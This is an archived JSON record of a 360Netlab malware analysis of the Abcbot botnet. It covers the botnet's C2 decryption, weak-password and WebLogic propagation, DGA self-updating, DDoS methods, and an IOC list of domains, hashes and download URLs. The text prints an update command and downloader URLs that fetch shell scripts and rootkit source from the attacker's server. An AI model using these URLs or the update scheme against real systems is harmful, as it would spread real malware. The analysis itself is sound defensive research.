{
	"id": "9b09a212-2914-4313-a1fb-26dd142b6e8e",
	"created_at": "2026-04-06T00:06:44.646574Z",
	"updated_at": "2026-04-10T03:20:42.248Z",
	"deleted_at": null,
	"sha1_hash": "9dee0bc88610e4fbd0b130395eb2374b9ea824d2",
	"title": "Abcbot, an evolving botnet",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1169438,
	"plain_text": "Abcbot, an evolving botnet\r\nBy Alex.Turing\r\nPublished: 2021-11-09 · Archived: 2026-04-05 20:05:50 UTC\r\nBackground\r\nBusiness on the cloud and security on the cloud is one of the industry trends in recent years. 360Netlab is also\r\ncontinuing to focus on security incidents and trends on the cloud from its own expertise in the technology field.\r\nThe following is a recent security incident we observed, where the infected device IP came from multiple cloud\r\nprovider platforms.\r\nOn July 14, 2021, our BotMon system identified an unknown ELF file (a14d0188e2646d236173b230c59037c7)\r\ngenerating a lot of scanning traffic, after analysis, we determined that this is a Go language implementation of\r\nScanner, based on its source path \"abc-hello\" string, we named it Abcbot internally.\r\nAt the beginning, Abcbot was relatively simple, and could be seen as a scanner for attacking Linux systems, with\r\na weak password \u0026 Nday vulnerability for worm-like propagation. One interesting thing is that Abcbot's source\r\npath has the \"dga.go\" string, but no related DGA implementation was found . We assumed that its authors would\r\nadd this feature in subsequent versions, other than that, we did not paid too much attention to it.\r\nAs time passed, Abcbot has continued to evolve, and as we expected, it added the DGA feature in\r\nsubsequent samples . Today Abcbot has the ability to self-updating, setting up Webserver, laughing DDoS, as\r\nwell as worm like propagation.\r\nOn October 8, 2021, Trend Micro released an analysis of this family, which focused on the pre-SHELL scripts\r\nthat spread Abcbot, but skimmed over the features of Abcbot itself.\r\nGiven that Abcbot is under continuous development, its features are constantly being updated, we decided to write\r\nthis article to share our findings with the community.\r\nTimeline\r\nOn July 14, 2021, abcbot was first captured with the main functionality of Scanner,WebServer.\r\nJuly 22, 2021, abcbot updated to include dga-related code in the self-updating function.\r\nOctober 10, 2021, abcbot performed minor update.\r\nOctober 12, 2021, another update, with some major code structure changes.\r\nOctober 21, 2021, another update, adding the open source ATK rootkit to support DDoS functionality.\r\nhttps://blog.netlab.360.com/abcbot_an_evolving_botnet_en/\r\nPage 1 of 16\n\nOctober 30, 2021, another update, abandoned ATK rootkit, to their own implementation of DDoS\r\nfunctionality.\r\nAbcbot Overview\r\nWe use the latest October 30, 2021 sample as a blueprint, this version targets mainly on common databases and\r\nWEB servers, it uses weak password \u0026 Nday vulnerability to achieve worm-like propagation, the main focus is\r\nfor DDoS.\r\nIt currently supports the following nine attack methods.\r\ntls Attack\r\ntcp Attack\r\nudp Attack\r\nace Attack\r\nhulk Attack\r\nhttpGet Attack\r\ngoldenEye Attack\r\nslowloris Attack\r\nbandwidthDrain Attack\r\nIts basic flow chart is shown below.\r\nSample Analysis\r\nWe captured a total of 6 different versions of abcbot samples, and the sample of October 30 was selected as the\r\nmain object of analysis in this paper, and its basic information is shown as follows.\r\nhttps://blog.netlab.360.com/abcbot_an_evolving_botnet_en/\r\nPage 2 of 16\n\nMD5:ae8f8cf967ca15a7689f2d1f79fbc5dc\r\nELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped\r\nPacker:upx\r\nDate:2021-10-30\r\nAbcbot uses a standard UPX shell. When it runs in the compromised device, Abcbot confuses the user by copying\r\nitself into the following files, then starting the dockerlogger, iptablesupdate processes.\r\n/bin/dockerlogger\r\n/usr/bin/dockerlogger\r\n/etc/iptablesupdate\r\nThe iptablesupdate process is responsible for scanning for new infected devices, reporting the device\r\ninformation to C2, and waiting for the execution of DDoS commands issued by C2.\r\nThe dockerlogger process is responsible for turning the infected device into a webserver, reporting the device\r\ninformation to C2, and waiting for the execution of the Updata command issued by the update server, let’s take a\r\ncloser look.\r\n0x01: Uploading device information to C2\r\nThe current Abcbot samples are hard-coded with a encrypted C2 string\r\n(\"GEVQYYdjQdquLemMLYlkLLXLQmq7NmL7NYXu\"), which is encoded using Base64 \u0026 XOR encryption.\r\nThe Base64 decoding operation is shown below, and it can be seen that Abcbot changes the Alphabet value, which\r\nit uses as LMNu67PQX21pqrR3YZaDEFGbcVIJjkKWdefstghiBACHlSTUmO5noxyz04vw89+/\r\nBy dissociating the Base64 decoded result with 0x31 0x32 0x33 , the following final result can be obtained\r\nhttp://103.209.103.16:26800\r\nhttps://blog.netlab.360.com/abcbot_an_evolving_botnet_en/\r\nPage 3 of 16\n\nAfter decrypting C2, both iptablesupdate and dockerlogger processes report device information to C2 via the\r\npath \"/api/postip\", and the format of the device information is OS:%v\\x09CPU:%v\\x09HX:%vh\\x09os-name:%v\\x09lanip:%v .\r\nNote both processes collect the same device information and call the abc_hello_util_Os_pz function. The only\r\ndifference is shown in the figure below, which shows that the dockerlogger process appends \"\\td0.02\" to the\r\nreported information, while iptablesupdate appends \"\\ ti0.02\", where the \"d\" and \"i\" characters imply the process\r\nreporting the traffic, and \"0.02\" is similar to the version (in the October 21 sample, the version is \"0.01\").\r\nThe actual traffic generated is shown below.\r\nhttps://blog.netlab.360.com/abcbot_an_evolving_botnet_en/\r\nPage 4 of 16\n\n0x02: Scan and propagation\r\nThe \"abc_hello_plugin_StartScan\" function is responsible for infecting new devices. Its logic is to generate\r\nrandom IPs, detect whether the ports on the IPs that can be attacked are open, and then attack the services by\r\neither going through the corresponding weak password list or using the Nday vulnerabilities.\r\nThe following code snippet shows that Abcbot tries to attack Weblogic.\r\nIn the Abcbot sample, you can clearly see the functions used in the attack on the relevant network services.\r\nhttps://blog.netlab.360.com/abcbot_an_evolving_botnet_en/\r\nPage 5 of 16\n\nThe weak passwords and vulnerabilities used by Abcbot are the following\r\nSSH weak password\r\nFTP weak password\r\nPostgreSQL weak password\r\nRedis weak password\r\nMssql weak password\r\nMongo weak password\r\nWebLogic Vulnerability (CVE-2020-14882)\r\n0x03: WebServer\r\nAbcbot uses the \"abc_hello_web_StartServer\" function to start a WebServer on the infected device, listening on\r\nport 26800, and the supported methods and paths are shown in the following table.\r\nMethod Path\r\nPOST /api/postip\r\nPOST /api/configlist\r\nPOST /api/getlist\r\nPOST /api/check\r\nhttps://blog.netlab.360.com/abcbot_an_evolving_botnet_en/\r\nPage 6 of 16\n\nThe actual effect is shown in the following figure.\r\nAt present, the path that really being called is \"/api/check\", which is used to determine whether the device has\r\nalready been infected by requesting the target ip:26800/api/check during the scanning and propagation process.\r\nThe other paths are only used to maintain connectivity and have no real use.When they are accessed, some logs\r\nfiles will be generated in the path \"/tmp.abchello\".\r\nIn fact, using \"curl-X POST\" cmd to test C2, you can find that the above 4 paths also exist on C2. The author of\r\nAbcbot seems to want to break the current C/S network model and bring the role of Bot in the network closer to\r\nServer. Therefore, we speculate that the network structure of Acbbot may shift to P2P.\r\n0x04: Self-updating\r\nOn July 22, Abcbot introduced the \"abc_hello_util_Updata\" function to handle self-updates. Its logic is to request\r\nthe \"2.txt\" resource from the remote server. The \"2.txt\" consists of two parts, which are in the format of\r\n\"Resource(hex format)|digital signature(hex format)\" . When Bot successfully pulls the 2.txt, it will verify\r\nthe digital signature by the following code snippet.\r\nhttps://blog.netlab.360.com/abcbot_an_evolving_botnet_en/\r\nPage 7 of 16\n\nThe hard-coded public key in the sample is\r\n-----BEGIN RSA PUBLIC KEY-----\r\nMFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAL3zj6XQt7gYe+L6oI/IUvlJNZVsg/JX\\x0AC7TCnl9p1JfBJFdx+W9FTFnO2Fr8/hAUtf1NpP/WG2fg\r\n-----END RSA PUBLIC KEY-----\r\nAfter the verification is successful, the Resource is further decomposed, and the format of the Resource is\r\n\"cmd|downloader url| crc32|cmd2\" .\r\nWhen the cmd is \"alldown2\", the downloader url is requested and the crc32 hash value of the file is verified. The\r\ndownloaded file completes the process of self-updating.\r\nThe actual 2.txt obtained is shown below.\r\nThe Resource part is decoded in HEX format which represents update command.\r\nhttps://blog.netlab.360.com/abcbot_an_evolving_botnet_en/\r\nPage 8 of 16\n\nalldown2|http://103.209.103.16:26800/ff.sh|611043B5|posterrorurl\r\nThere are 3 sources for the remote server domain name in this process as follows.\r\n1. Hard-coded TOR domain name (decryption method is the same as C2)\r\n2. DGA algorithm generates prefix strings, which are spliced with 3 suffixes (.com, .tk, .pages.dev) to form\r\nthe domain name\r\n3. DGA algorithm generates the string as a github account, and then gets the upgrade resources from this\r\ngithub account\r\nThe code snippet below is the process of Abcbot requesting 2.txt resources from DGA generated domain name\r\nand GITHUB repository.\r\nThe domain names used for the samples at each time point are shown below.\r\nDate MD5 Res Tor Domain DGA Domain DGA Github\r\n07-14 a14d0188e2646d236173b230c59037c7 0 0 0\r\n07-22 e535215fad2ef0885e03ba111bd36e24 1 3/month 1/month\r\nhttps://blog.netlab.360.com/abcbot_an_evolving_botnet_en/\r\nPage 9 of 16\n\nDate MD5 Res Tor Domain DGA Domain DGA Github\r\n10-10 6e66456ffb457c52950cf05a6aaabe4a 1 3/month 0\r\n10-12 39d373434c947742168e07cc9010c992 1 3/month 0\r\n10-21 e95c9bae6e2b44c6f9b98e2dfd769675 0 27/month 0\r\n10-30 ae8f8cf967ca15a7689f2d1f79fbc5dc 0 27/month 0\r\nPart of DGA-generated domain names for Abcbot in October are shown below.\r\ndgixyyfug.tk\r\ndgixyyfug.com\r\ndgixyyfug.pages.dev\r\nguyfixdyg.tk\r\nguyfixdyg.com\r\nguyfixdyg.pages.dev\r\nWhen Abcbot started to use DGA to generate domain names for updating servers, we grabbed some of them at the\r\nfirst opportunity, which allowed us to measure its size. From the current statistics Abcbot is not very large, with a\r\ntotal of 261 IPs.\r\nThe current distribution of infected hosts by service providers is shown below.\r\nhttps://blog.netlab.360.com/abcbot_an_evolving_botnet_en/\r\nPage 10 of 16\n\n0x05: DDoS\r\nOn October 21, Abcbot introduced the \"main_TimeDDos\" function to support DDoS attacks, its logic is to request\r\nDDoS instructions from C2 via the path \"/api/getlist\", the instructions consist of 2 parts, \"DDoS instruction (hex\r\nformat) | instruction digital signature (hex format)\" . When Bot receives the instruction, it reuses the\r\ndigital signature in the self-renewal subsection above for verification, and can only execute it after the verification\r\nis successful.\r\nThe actual traffic generated is shown below, the \"73746f70\" string before the \"|\" character is the \"stop\" instruction.\r\nInteresting thing is that the sample on October 21 (md5:e95c9bae6e2b44c6f9b98e2dfd769675) uses the open\r\nsource ATK Rootkit to implement the DDoS function.\r\nhttps://blog.netlab.360.com/abcbot_an_evolving_botnet_en/\r\nPage 11 of 16\n\nAbcbot modified the main function in the ATK source code file share_atk_svr.c , and implemented a UDP\r\nserver by monitoring SERV_PORT on 127.0.0.1 through the following code. SERV_PORT has 4, respectively\r\n88,89,90,91.\r\nsockfd = socket(AF_INET, SOCK_DGRAM, 0);\r\nbzero(\u0026servaddr, sizeof(servaddr));\r\nservaddr.sin_family = AF_INET;\r\n// servaddr.sin_addr.s_addr = htonl(INADDR_ANY); // 0.0.0.0\r\nservaddr.sin_addr.s_addr = inet_addr(\"127.0.0.1\");\r\nservaddr.sin_port = htons(SERV_PORT);\r\nWhen Abcbot receives the command sent by C2, it forwards the command to the UDP server, and the ATK rootkit\r\nperforms the DDoS attack. The code snippet shown below is exactly the DDoS command\"BigUdp\" forwarded to\r\nthe rootkit.\r\nThe supported commands are shown below.\r\nstop\r\nsyn\r\ndns\r\nhttps://blog.netlab.360.com/abcbot_an_evolving_botnet_en/\r\nPage 12 of 16\n\nbigudp\r\nWe do not consider this approach to DDoS attacks a good one, as ATK rootkit is stored in the form of source\r\ncode on a remote server,\r\nxl_x64scan1=\"http://103.209.103.16:26800/atk.tar.gz\"\r\nxl_x64scan2=\"http://103.209.103.16:26800/atk.tar.gz\"\r\nthus requires Abcbot to download the source code, compile, and load the rootkit module before performing DDoS\r\nattack, this process requires too many steps, and any step that is faulty will result in the failure of the DDoS\r\nfunction.\r\nApparently the author had same thoughts, and in the October 30 sample\r\n(md5:ae8f8cf967ca15a7689f2d1f79fbc5dc) an update abandoned the ATK rootkit and implemented its own attack\r\nmodule, with nine attack methods being supported.\r\nSummary\r\nIn the process of reverse analysis, we found many oddities in Abcbot, such as \"repeatedly reporting local device\r\ninformation, not registering DGA domain names, unreasonable exclusion of TOR \u0026 Github resource servers, and\r\nwebserver functionality not really enabled\", which gives us a feeling that Abcbot authors are testing various\r\ntechnologies. The update process in these six months is not so much a continuous upgrade of features as a trade-off between different technologies. Abcbot is slowly moving from infancy to maturity. We do not consider this\r\nstage to be the final form, there are obviously many areas of improvement or features to be developed at this stage.\r\nLet's wait and see what happens.\r\nReaders are always welcomed to reach us on Twitter or email us to netlab at 360 dot cn.\r\nIOC\r\nC2 \u0026 Resource Server\r\nDGA Domain(October)\r\nhttps://blog.netlab.360.com/abcbot_an_evolving_botnet_en/\r\nPage 13 of 16\n\ndgixyyfug.tk\r\ndgixyyfug.com\r\ndgixyyfug.pages.dev\r\nguyfixdyg.tk\r\nguyfixdyg.com\r\nguyfixdyg.pages.dev\r\ngfgiudyyx.tk\r\ngfgiudyyx.com\r\ngfgiudyyx.pages.dev\r\nxgudyfyig.tk\r\nxgudyfyig.com\r\nxgudyfyig.pages.dev\r\nyugxdigfy.tk\r\nyugxdigfy.com\r\nyugxdigfy.pages.dev\r\ngdgiyyfxu.tk\r\ngdgiyyfxu.com\r\ngdgiyyfxu.pages.dev\r\ngdiuyyfgx.tk\r\ngdiuyyfgx.com\r\ngdiuyyfgx.pages.dev\r\nfgiudxyyg.tk\r\nfgiudxyyg.com\r\nfgiudxyyg.pages.dev\r\nygfydgxui.tk\r\nygfydgxui.com\r\nygfydgxui.pages.dev\r\nDGA Domain(November)\r\nenjuyzkpr.tk\r\nenjuyzkpr.com\r\nenjuyzkpr.pages.dev\r\nrpzkjueyn.tk\r\nrpzkjueyn.com\r\nrpzkjueyn.pages.dev\r\nnkrjpezyu.tk\r\nnkrjpezyu.com\r\nnkrjpezyu.pages.dev\r\nunpeykzjr.tk\r\nunpeykzjr.com\r\nunpeykzjr.pages.dev\r\nypnuejrkz.tk\r\nypnuejrkz.com\r\nhttps://blog.netlab.360.com/abcbot_an_evolving_botnet_en/\r\nPage 14 of 16\n\nypnuejrkz.pages.dev\r\nnerjyzkup.tk\r\nnerjyzkup.com\r\nnerjyzkup.pages.dev\r\nnejpzykru.tk\r\nnejpzykru.com\r\nnejpzykru.pages.dev\r\nknjpeuzyr.tk\r\nknjpeuzyr.com\r\nknjpeuzyr.pages.dev\r\nzrkyenupj.tk\r\nzrkyenupj.com\r\nzrkyenupj.pages.dev\r\nIP\r\n103.209.103.16 China|Hong_Kong|Unknown AS63916|IPTELECOM_Global\r\nTor\r\nhttp://vgnaovx6prvmvoeabk5bxfummn3ltdur3h4ilnklvaox4lge2rp4nzqd.onion\r\nSample MD5\r\n0786c80bfcedb7da9c2d5edbe9ff662f\r\n0f2619811ceaf85baa72f9c8f876a59a\r\n1177c135f15951418219a97b3caad4e1\r\n1a720cc74ecf330b8f13412de4d5646b\r\n39d373434c947742168e07cc9010c992\r\n3f277c7b4c427f9ef02cf8df4dd7be44\r\n5d37a61451e5cfdeca272369ac032076\r\n6e66456ffb457c52950cf05a6aaabe4a\r\n6e66456ffb457c52950cf05a6aaabe4a\r\n89ffd4f612ce604457446ee2a218de67\r\n8f3558b29d594d33e69cea130f054717\r\na14d0188e2646d236173b230c59037c7\r\na17ea52318baa4e50e4b6d3a79fbd935\r\na4c7917787dc28429839c7d588956202\r\nae8f8cf967ca15a7689f2d1f79fbc5dc\r\nbaeb11c659b8e38ea3f01ad075e9df9a\r\nc27d1c81a3c45776e31cfb384787c674\r\nc64fbc7d3586d42583aa3a0dc3ea529f\r\nhttps://blog.netlab.360.com/abcbot_an_evolving_botnet_en/\r\nPage 15 of 16\n\ne535215fad2ef0885e03ba111bd36e24\r\ne95c9bae6e2b44c6f9b98e2dfd769675\r\nDownloader\r\nhttp://103[.209.103.16:26800/atk.tar.gz\r\nhttp://103[.209.103.16:26800/dd.sh\r\nhttp://103[.209.103.16:26800/ff.sh\r\nhttp://103[.209.103.16:26800/linux64-shell\r\nhttp://103[.209.103.16:26800/xlinux\r\nSource: https://blog.netlab.360.com/abcbot_an_evolving_botnet_en/\r\nhttps://blog.netlab.360.com/abcbot_an_evolving_botnet_en/\r\nPage 16 of 16\n\nThe domain names Date MD5 used for the samples at each time point are Res Tor shown below. Domain DGA Domain DGA Github\n07-14 a14d0188e2646d236173b230c59037c7 0 0 0\n07-22 e535215fad2ef0885e03ba111bd36e24 1 3/month 1/month\n Page 9 of 16",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.netlab.360.com/abcbot_an_evolving_botnet_en/"
	],
	"report_names": [
		"abcbot_an_evolving_botnet_en"
	],
	"threat_actors": [],
	"ts_created_at": 1775434004,
	"ts_updated_at": 1775791242,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9dee0bc88610e4fbd0b130395eb2374b9ea824d2.pdf",
		"text": "https://archive.orkl.eu/9dee0bc88610e4fbd0b130395eb2374b9ea824d2.txt",
		"img": "https://archive.orkl.eu/9dee0bc88610e4fbd0b130395eb2374b9ea824d2.jpg"
	}
}